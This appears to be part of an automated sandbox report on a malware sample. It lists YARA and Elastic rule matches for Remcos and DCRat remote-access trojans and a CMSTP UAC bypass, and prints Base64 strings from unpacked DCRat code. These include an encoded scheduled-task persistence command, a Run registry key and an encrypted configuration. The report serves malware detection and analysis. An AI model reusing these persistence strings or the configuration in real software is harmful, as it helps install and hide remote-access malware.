        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000004.00000002.3316092029.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000008.00000002.2081271482.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000006.00000002.2078678717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000004.00000002.3309788726.0000000003118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000004.00000002.3309788726.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000008.00000002.2085488605.0000000005756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000008.00000002.2081271482.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000000A.00000002.2085289507.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 0000000A.00000002.2085289507.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 3160, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: RegAsm.exe PID: 2964, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Settings.csBase64 encoded string: 'VEt2PmhXMMIt1dJJJECAz1WHnDL0wlv8IZt1vpqPNSFxB38K5Btmk1hTwcjn9han0ayQP0bB+Dh7QB7osZeYkA==', 'xd+Dai6+yRW6ujvs7vLc/cH9S9P/cTNYodhYagiqgL97VyapNynPnF0PTLKK2XHfmzvtJP1hDiiCDjCCbbR2gQ==', 'sMndhh2MvpuufroCmflUDuSwMQ+cOpIT+VS5R/tqUQcheLpWC3ZItPRcfQ5pnglAkiJsD3tpCmljZBvTe2tQmw==', 'pB01OnXWD+ngTP35Ii2u/7nr6IpExfhu+WCLM6omlGKD49lHckRODiv/tW01SnNvTobEOHUlz+Lm0QwPEFT6sg==', 'Kst/cpNW+stInyo+R7DQSM2o2em2NU3tslltNPKEbP0VufIxNIpr8zRAFAch4T0zWNHbhiNUVWo4k1z3WEVwaA==', 'mtRC3wTN5SvMmbJs9uQ1SY+OPyMC6gMCVuHBNAUrmIH+ww3t7CVwPp/OXhdZ5YiNclgAKmE7+7Lhumcv5vNALBO9qCqSauTILC9saRZ6ACXZyGf1Lmj48gVVjJvkOLQRzsxGGJbjZF6Asb83YaHLELMIT8pRILLAxbzoESgfMYDwAAdYw/Nq0qVAVAKJo2gF81yzR+Vb5ymN2hldxU61V8i2lKAhID/S/NhP6F30oKnyF60/3zQU4HnJ5p/ixOi/jtkbI8fXBYRpYkSRAJyBMwTnbM61ihr4dIxGApsBaD0FGMmrkgLw0nNMmxRoQNFOEsDWUZYM7fR4P645Wfmw85VPWOSgmIcuYyIYntXq4Ga7sbfBYu1SR0CDxYp/+bLafN/HMPsOdfaM3jwVSfv26u5j5rmdDs51u5R4L4Bs7Y2iW1p8/OUqJ/9/jDzzzJsv4xuj5WgoUA31ujTFJOQUE4+HP2yqxt9LfNkUO9dCD06oBSbXhM3veF8110H2edIxbrpBbrHbMeq62UWyaws9YXdwxoVcly2DA/LBRQYrIbqPiFBC12hCcF1AByQIlILMkz/u6W1f9tWWqcTa7r1oyX7YltZWqsDxUchQPseFvEawNpGtK7BcSuVW9MSUd2AzDau3mwL9GsrmbsOy/FolLieNVkjeBLLqRPJmWcIjlm+UNYE7/WVNzC3uxtyovWbng9VR/KvQaxnT7qbnXoiXZfBdCV+63p47Arv1upSkaeThXoXpNn0IDwryU1PmAA6v7BaLuLFxTISAXLUL1qRu9CMrpOD31VJcV+gbl+ipGdpKTqj58RyIMBiWubY8TUB4X07OmRbPXosP/QxrCKY/NtvTCjymKOel1Ldny4jKIcWyMB79SBIsPijR9NtercglA0VoTvGplAm454VOLz9Or+zYi3U92tPOowe49/NXlDYBGDXEuqiAYlvW++FymOq3LYrvxEaMIs8S6vQlw4NxSAiDLyQOpWVklkmvJzSXRQHOcah5aUx2sQ8lrvU3lGz9qmrfUfFKLDSWDvejZGDo2qjAl3KXlJkJzairiUzGkcU=', 'qvNv/3DmbVHdwqVdt0nmMBUqDltRMhUdpJZQY4E27P91AuhYn8MBn7MG0uaBbEksI2BCcwA9SOVdNVMyyZW+C6umVJzrelhDRRlJvIYXDzUnzDSejRJ+/otwdE5kmTxz9quBnXtDtKnR7XsRi+waktchFP9+P+O4BwlZ6ZZNxNTRjBIZrrTDEvMlOaCF8M92/VoTExAm8SfrchmqAmBb9UJxqz7Da58InXRt44cQe6j+AjzgkzKNfaiLo2CCmBZY0UWj+2RYheIM4lCnLtNCReavV/Vmb73Un6j/FN22EVg=', 'I1W+CS5O2xwz/mIgFmMBykN7Ee7ho5k8eZ5J6D3YW57aE97qFTUg61n37Li1o0Waqgg19N9QcGdAkEgW6qdgPw==', 'pkvWx9EB/VxDNg1SOI1aRC8cUUDiyfBqf387cZf1bY3ag1BHeM7d+UkRwd4aUVNnt8L65pephvmHsecapeuOSQ==', 'w10TUuQ/QqDCUD6gjZNbacB4b7EcTgPK5AdSg9KwZ7HU3xbacvwRw2NaAtvWQW2okZPgVBwhKrZHG02cp/i9cA==', 'qUiaaVr6ViVdUFy1GCSy/XIoHuDvFENF11hZNTsIxy0QAKLzULCEUoS3YIXYEprVKBqz5RLqqorfOcVVmT8kcw=='
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, Settings.csBase64 encoded string: 'VEt2PmhXMMIt1dJJJECAz1WHnDL0wlv8IZt1vpqPNSFxB38K5Btmk1hTwcjn9han0ayQP0bB+Dh7QB7osZeYkA==', 'xd+Dai6+yRW6ujvs7vLc/cH9S9P/cTNYodhYagiqgL97VyapNynPnF0PTLKK2XHfmzvtJP1hDiiCDjCCbbR2gQ==', 'sMndhh2MvpuufroCmflUDuSwMQ+cOpIT+VS5R/tqUQcheLpWC3ZItPRcfQ5pnglAkiJsD3tpCmljZBvTe2tQmw==', 'pB01OnXWD+ngTP35Ii2u/7nr6IpExfhu+WCLM6omlGKD49lHckRODiv/tW01SnNvTobEOHUlz+Lm0QwPEFT6sg==', 'Kst/cpNW+stInyo+R7DQSM2o2em2NU3tslltNPKEbP0VufIxNIpr8zRAFAch4T0zWNHbhiNUVWo4k1z3WEVwaA==', 'mtRC3wTN5SvMmbJs9uQ1SY+OPyMC6gMCVuHBNAUrmIH+ww3t7CVwPp/OXhdZ5YiNclgAKmE7+7Lhumcv5vNALBO9qCqSauTILC9saRZ6ACXZyGf1Lmj48gVVjJvkOLQRzsxGGJbjZF6Asb83YaHLELMIT8pRILLAxbzoESgfMYDwAAdYw/Nq0qVAVAKJo2gF81yzR+Vb5ymN2hldxU61V8i2lKAhID/S/NhP6F30oKnyF60/3zQU4HnJ5p/ixOi/jtkbI8fXBYRpYkSRAJyBMwTnbM61ihr4dIxGApsBaD0FGMmrkgLw0nNMmxRoQNFOEsDWUZYM7fR4P645Wfmw85VPWOSgmIcuYyIYntXq4Ga7sbfBYu1SR0CDxYp/+bLafN/HMPsOdfaM3jwVSfv26u5j5rmdDs51u5R4L4Bs7Y2iW1p8/OUqJ/9/jDzzzJsv4xuj5WgoUA31ujTFJOQUE4+HP2yqxt9LfNkUO9dCD06oBSbXhM3veF8110H2edIxbrpBbrHbMeq62UWyaws9YXdwxoVcly2DA/LBRQYrIbqPiFBC12hCcF1AByQIlILMkz/u6W1f9tWWqcTa7r1oyX7YltZWqsDxUchQPseFvEawNpGtK7BcSuVW9MSUd2AzDau3mwL9GsrmbsOy/FolLieNVkjeBLLqRPJmWcIjlm+UNYE7/WVNzC3uxtyovWbng9VR/KvQaxnT7qbnXoiXZfBdCV+63p47Arv1upSkaeThXoXpNn0IDwryU1PmAA6v7BaLuLFxTISAXLUL1qRu9CMrpOD31VJcV+gbl+ipGdpKTqj58RyIMBiWubY8TUB4X07OmRbPXosP/QxrCKY/NtvTCjymKOel1Ldny4jKIcWyMB79SBIsPijR9NtercglA0VoTvGplAm454VOLz9Or+zYi3U92tPOowe49/NXlDYBGDXEuqiAYlvW++FymOq3LYrvxEaMIs8S6vQlw4NxSAiDLyQOpWVklkmvJzSXRQHOcah5aUx2sQ8lrvU3lGz9qmrfUfFKLDSWDvejZGDo2qjAl3KXlJkJzairiUzGkcU=', 'qvNv/3DmbVHdwqVdt0nmMBUqDltRMhUdpJZQY4E27P91AuhYn8MBn7MG0uaBbEksI2BCcwA9SOVdNVMyyZW+C6umVJzrelhDRRlJvIYXDzUnzDSejRJ+/otwdE5kmTxz9quBnXtDtKnR7XsRi+waktchFP9+P+O4BwlZ6ZZNxNTRjBIZrrTDEvMlOaCF8M92/VoTExAm8SfrchmqAmBb9UJxqz7Da58InXRt44cQe6j+AjzgkzKNfaiLo2CCmBZY0UWj+2RYheIM4lCnLtNCReavV/Vmb73Un6j/FN22EVg=', 'I1W+CS5O2xwz/mIgFmMBykN7Ee7ho5k8eZ5J6D3YW57aE97qFTUg61n37Li1o0Waqgg19N9QcGdAkEgW6qdgPw==', 'pkvWx9EB/VxDNg1SOI1aRC8cUUDiyfBqf387cZf1bY3ag1BHeM7d+UkRwd4aUVNnt8L65pephvmHsecapeuOSQ==', 'w10TUuQ/QqDCUD6gjZNbacB4b7EcTgPK5AdSg9KwZ7HU3xbacvwRw2NaAtvWQW2okZPgVBwhKrZHG02cp/i9cA==', 'qUiaaVr6ViVdUFy1GCSy/XIoHuDvFENF11hZNTsIxy0QAKLzULCEUoS3YIXYEprVKBqz5RLqqorfOcVVmT8kcw=='
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
